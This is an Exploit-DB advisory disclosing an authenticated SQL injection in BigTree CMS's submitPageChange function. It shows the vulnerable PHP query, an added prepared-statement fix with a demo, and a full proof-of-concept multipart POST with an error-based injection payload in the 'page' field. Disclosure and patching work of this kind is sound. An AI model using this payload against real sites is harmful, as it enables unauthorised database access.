BigTree CMS 4.2.11 – SQL Injection

  • Author: Mehmet Ince
    Date: 2016-06-27
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/40024/

    1. ADVISORY INFORMATION
    ========================================
    Title: BigTree CMS <= 4.2.11 Authenticated SQL Injection Vulnerability
    Application: BigTree CMS
    Remotely Exploitable: Yes
    Versions Affected: < 4.2.11
    Vendor URL: https://www.bigtreecms.org
    Bugs: SQL Injection
    Author: Mehmet Ince
    Date found: 27 Jun 2016
    
    
    2. CREDIT
    ========================================
    This vulnerability was identified during an external penetration test
    by Mehmet INCE from PRODAFT / INVICTUS.
    
    Netsparker was used for initial detection.
    
    3. DETAILS
    ========================================
    
    The following code shows that the $page variable is used inside an SQL
    query without proper escaping or a PDO prepared statement.
    
    File : /core/inc/bigtree/admin.php
    
    Lines 6866 - 6879
    
    function submitPageChange($page,$changes) {
        if ($page[0] == "p") {
            // It's still pending...
            $type = "NEW";
            $pending = true;
            $existing_page = array();
            $existing_pending_change = array("id" => substr($page,1));
        } else {
            // It's an existing page
            $type = "EDIT";
            $pending = false;
            $existing_page = BigTreeCMS::getPage($page);
            $existing_pending_change = sqlfetch(sqlquery("SELECT id FROM bigtree_pending_changes WHERE `table` = 'bigtree_pages' AND item_id = '$page'"));
        }
        ...
    }
    
    
    The submitPageChange function is therefore vulnerable to SQL injection.
    It is called from two places in the code base; the following list shows
    the callers.
    
    /core/admin/modules/pages/front-end-update.php
    /core/admin/modules/pages/update.php
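    For comparison, here is the same pending-change lookup written the way the
    advisory says it should have been, with a bound parameter instead of string
    interpolation and an allow-list check on the shape of $page. This is an added
    example, not BigTree's code and not the fix submitted in the pull request; the
    function name findPendingChangeForPage and the PDO handle are assumptions, while
    the table and column names are those from the vulnerable query above. The demo
    at the bottom runs against an in-memory SQLite database with constructed rows.

```php
<?php
// Added example (not BigTree's code): the lookup from submitPageChange()
// rewritten with a PDO prepared statement. $db is an assumed PDO handle;
// table/column names come from the advisory's vulnerable query.

function findPendingChangeForPage(PDO $db, string $page): ?array {
    // The original distinguishes "p<id>" (a pending change) from a numeric
    // page id. Validate the shape first so anything else never reaches SQL.
    if (preg_match('/^p(\d+)$/', $page, $m)) {
        return ['id' => (int)$m[1]];
    }
    if (!ctype_digit($page)) {
        throw new InvalidArgumentException('page must be a numeric id or p<id>');
    }

    // Bound parameter: the value travels separately from the query text, so a
    // quote character inside $page cannot alter the statement's structure.
    $stmt = $db->prepare(
        "SELECT id FROM bigtree_pending_changes
          WHERE `table` = 'bigtree_pages' AND item_id = :page"
    );
    $stmt->execute([':page' => $page]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Self-contained demo with constructed data (SQLite accepts MySQL-style
// backtick identifiers, so the query text is unchanged).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE bigtree_pending_changes (id INTEGER PRIMARY KEY, `table` TEXT, item_id TEXT)");
$db->exec("INSERT INTO bigtree_pending_changes VALUES (7, 'bigtree_pages', '2')");

var_dump(findPendingChangeForPage($db, '2'));   // existing page: row looked up
var_dump(findPendingChangeForPage($db, 'p5'));  // pending change: id parsed, no query
try {
    findPendingChangeForPage($db, "-1' or 1=1");   // rejected before any SQL runs
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```

    The shape check is defence in depth rather than the primary control: the
    prepared statement alone closes the injection, but rejecting malformed ids
    early also gives a clean point to log attempts like the one in the PoC below.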
    
    
    PoC:
    
    The following HTTP POST request was used to exploit the SQL injection
    flaw.
    
    POST /site/index.php/admin/pages/update/ HTTP/1.1
    Cache-Control: no-cache
    Referer: http://10.0.0.154/site/index.php/admin/pages/edit/2/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
    Accept-Language: en-us,en;q=0.5
    X-Scanner: Netsparker
    Cookie: PHPSESSID=amsscser3eg7fkljpjjt78ki17; hide_bigtree_bar=; bigtree_admin[email]=mehmet%40mehmetince.net; bigtree_admin[login]=%5B%22session-5770eca81c6d86.91986415%22%2C%22chain-5770ec71e2d7d3.28696204%22%5D; PHPSESSID=lsrbe949jc3na5j1sof19a3s53
    Host: 10.0.0.154
    Accept-Encoding: gzip, deflate
    Content-Length: 2248
    Content-Type: multipart/form-data; boundary=b788b047b8e345b792cdc1f81fef2106
    
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="MAX_FILE_SIZE"
    
    2097152
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="_bigtree_post_check"
    
    success
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="page"
    
    -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT
    COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
    FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="nav_title"
    
    The Trees
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="title"
    
    The Trees
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="publish_at"
    
    
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="expire_at"
    
    
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="in_nav"
    
    
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="redirect_lower"
    
    
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="trunk"
    
    
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="external"
    
    
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="new_window"
    
    Yes
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="resources[page_header]"
    
    The Trees
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="tag_entry"
    
    
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="route"
    
    trees
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="seo_invisible"
    
    
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="ptype"
    
    Save
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="max_age"
    
    3
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="template"
    
    
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="meta_keywords"
    
    
    --b788b047b8e345b792cdc1f81fef2106
    Content-Disposition: form-data; name="meta_description"
    
    
    --b788b047b8e345b792cdc1f81fef2106--
    
    
    4. TIMELINE
    ========================================
    27 Jun 2016 - Netsparker identified the SQL injection.
    27 Jun 2016 - Source code review and root-cause analysis of the SQLi.
    27 Jun 2016 - Issue resolved by the PRODAFT / INVICTUS team.
    27 Jun 2016 - Pull request sent.
    
    https://github.com/bigtreecms/BigTree-CMS/pull/256
    
    -- 
    Sr. Information Security Engineer
    https://www.mehmetince.net